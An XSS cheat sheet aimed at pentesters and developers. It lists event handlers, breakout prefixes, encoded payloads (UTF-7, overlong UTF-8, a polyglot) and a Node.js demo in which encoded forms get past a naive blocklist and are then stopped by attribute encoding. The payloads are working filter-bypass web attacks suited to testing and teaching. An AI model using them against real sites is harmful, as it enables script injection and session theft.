Title: Ultimate Cross Site Scripting Attack Cheat Sheet
Last Update: 2018-06-28
Note: This is a technical sheet for research about cross site scripting (XSS) attacks. Please continue the ultimate XSS cheat sheet list or contribute to update. This cheat sheet list goes out to assist pentesters, developers, researchers & whitehats.

Tags to Trigger XSS Attacks (these are event handler attributes; the script goes in the attribute value and fires on the named event):
onclick
ondblclick
onmousedown
onmousemove
onmouseover
onmouseout
onmouseup
onkeydown
onkeypress
onkeyup
onabort
onerror
onload
onresize
onscroll
onunload
onsubmit
onblur
onchange
onfocus
onreset
onselect
onMoveOn (not a standard DOM event handler name, unlike the others in this list)

Brackets for Tags (prefixes that close the attribute value and/or tag the input landed in before the payload starts; %20 is a URL-encoded space):
>"
">
<"
><
>"<
.\>"%20<./
/>%20<
%20/%20>
%20">%20<
%3E%3C (URL-encoded ><)
Pjw= (base64-encoded ><)

XSS Strings:
exp/*
]]
document.cookie=true');
?>
+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- (UTF-7: +ADw- is < and +AD4- is >; works where the page charset can be forced to UTF-7)
&
&{document.cookie=true;}; (JavaScript entity syntax, only honoured by legacy Netscape 4)
@mario_payload
<
;
]]>
[\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script> (overlong two-byte UTF-8 encoding of <, accepted by lenient decoders and missed by filters that look for the single byte 0x3C)
(Several strings in this section survive only as their attribute, comment and script fragments; the tag markup around them is not preserved here.)

Restriction Bypass (every XSS string above repeated with the >" breakout prefixed, so the payload first closes an open attribute value and tag; entries whose markup is not preserved appear as the bare prefix and are listed once):
>"
>"exp/*
>"]]
>"document.cookie=true');
?>
>" +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
>"&
>"&{document.cookie=true;};
>"<
>";
]]>
[\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Others:
Random
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'> (polyglot: terminates a single- or double-quoted JavaScript string, an escaped quote, an HTML comment or an attribute before the payload; String.fromCharCode(88,83,83) spells XSS without quote characters)
'';!--"=&{()} (probe string: submit it, then check which of the returned characters come back unencoded)
">
perl -e 'print "";' > out
perl -e 'print "alert(\"XSS\")";' > out (both write the payload to the file out so it can be submitted from a file instead of typed; the tag markup inside the print is not preserved here)
<
\";alert('XSS');//
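An added worked example, not code from the original sheet. It reproduces the alternative encodings of < and > listed above (+ADw-/+AD4- in UTF-7, the overlong bytes C0 BC, %3E%3C and Pjw= for the pair ><), prefixes a payload body with the Brackets for Tags breakouts the way Restriction Bypass does with >", and runs the results through a constructed naive blocklist filter and a constructed attribute template to show which encoded forms slip past a literal match and how attribute encoding closes the breakout. Runs under Node.js with no dependencies; the filter, the template, the control payload and all function names are assumptions made for this example.

```javascript
// Added example for this cheat sheet, not code from the original page.
// Runs under Node.js (uses the Buffer global). The filter, the template and
// the control payload are constructed for this example.

// Breakout prefixes copied from the "Brackets for Tags" list.
const BREAKOUTS = ['>"', '">', '<"', '><', '>"<', '/>%20<', '%20/%20>', '%20">%20<', '%3E%3C'];

// UTF-7 (RFC 2152): '+' + unpadded base64 of the UTF-16BE code units + '-'.
// '<' (U+003C) becomes +ADw- and '>' (U+003E) becomes +AD4-, the form used in
// the +ADw-SCRIPT+AD4- string above. BMP characters only.
function utf7Encode(str) {
  const bytes = [];
  for (const ch of str) {
    const cu = ch.charCodeAt(0);
    bytes.push(cu >> 8, cu & 0xff);
  }
  return '+' + Buffer.from(bytes).toString('base64').replace(/=+$/, '') + '-';
}

// Overlong two-byte UTF-8 form of an ASCII code point. A strict decoder
// rejects it; a lenient one yields the ASCII character again, so the '<' in
// [\xC0][\xBC]script> is invisible to a filter that looks for byte 0x3C.
function overlongUtf8(ch) {
  const cp = ch.charCodeAt(0);
  if (cp > 0x7f) throw new RangeError('overlong form shown for ASCII only');
  return Buffer.from([0xc0 | (cp >> 6), 0x80 | (cp & 0x3f)]);
}

// The remaining two representations of the pair '><' on the sheet.
function urlEncodedPair() { return encodeURIComponent('><'); }         // %3E%3C
function base64Pair() { return Buffer.from('><').toString('base64'); } // Pjw=

// Prefix one payload body with every breakout, as "Restriction Bypass" does
// with '>"' for every string in "XSS Strings".
function withBreakouts(body) {
  return BREAKOUTS.map((prefix) => prefix + body);
}

// Constructed strawman filter: blocks input containing a literal '<script'.
// It exists here to be bypassed, not to be copied.
function naiveFilterBlocks(input) {
  return /<script/i.test(input);
}

// Payloads the strawman lets through.
function bypasses(payloads) {
  return payloads.filter((p) => !naiveFilterBlocks(p));
}

// Constructed vulnerable template: raw value inside a double-quoted attribute.
function renderUnsafe(value) {
  return `<input name="q" value="${value}">`;
}

// Hardened form: encode the five characters that can change HTML context.
// With this in place none of the BREAKOUTS can leave the attribute value.
function attrEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}
function renderSafe(value) {
  return `<input name="q" value="${attrEncode(value)}">`;
}

// Number of tag openers in rendered output; a correct render has exactly one.
function tagOpenerCount(html) {
  return (html.match(/</g) || []).length;
}

const OVERLONG_LT = overlongUtf8('<').toString('latin1');
const SAMPLE_PAYLOADS = [
  '<script>document.cookie=true</script>',                            // constructed control
  '+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-',           // from the sheet
  `${OVERLONG_LT}script>document.cookie=true;${OVERLONG_LT}/script>`, // from the sheet
];

console.log(utf7Encode('<'), utf7Encode('>'), overlongUtf8('<').toString('hex'), urlEncodedPair(), base64Pair());
console.log('past the naive filter:', bypasses(SAMPLE_PAYLOADS).length, 'of', SAMPLE_PAYLOADS.length);
for (const v of withBreakouts('x')) {
  console.log(tagOpenerCount(renderUnsafe(v)), tagOpenerCount(renderSafe(v)), renderSafe(v));
}
```

The filter misses both encoded forms because it compares bytes while the browser compares decoded characters; the only durable fix is the one in renderSafe, encoding for the exact output context rather than blocking strings.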